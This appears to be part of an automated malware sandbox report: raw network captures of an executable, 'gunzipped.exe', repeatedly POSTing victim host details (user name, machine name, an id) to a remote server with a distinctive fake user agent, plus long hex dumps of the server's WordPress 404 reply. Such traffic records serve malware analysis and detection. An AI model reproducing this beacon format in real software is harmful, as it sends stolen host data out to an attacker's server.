5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:17:00.888991117 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:00.889027119 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:00.889061928 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:00.889098883 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:17:00.889137983 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:00.889229059 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:00.889266014 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:00.889303923 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:17:00.889342070 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          7192.168.2.549712136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:01.257517099 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:01.465902090 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:02.374149084 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:01 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:17:02.374207973 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:02.374247074 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:02.374284029 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:02.374322891 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:17:02.374361992 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:02.374417067 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:02.374454975 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:02.374490976 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:17:02.374531984 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          8192.168.2.549713136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:02.984312057 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:03.192660093 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:04.104320049 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:03 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:17:04.104433060 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:04.104473114 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
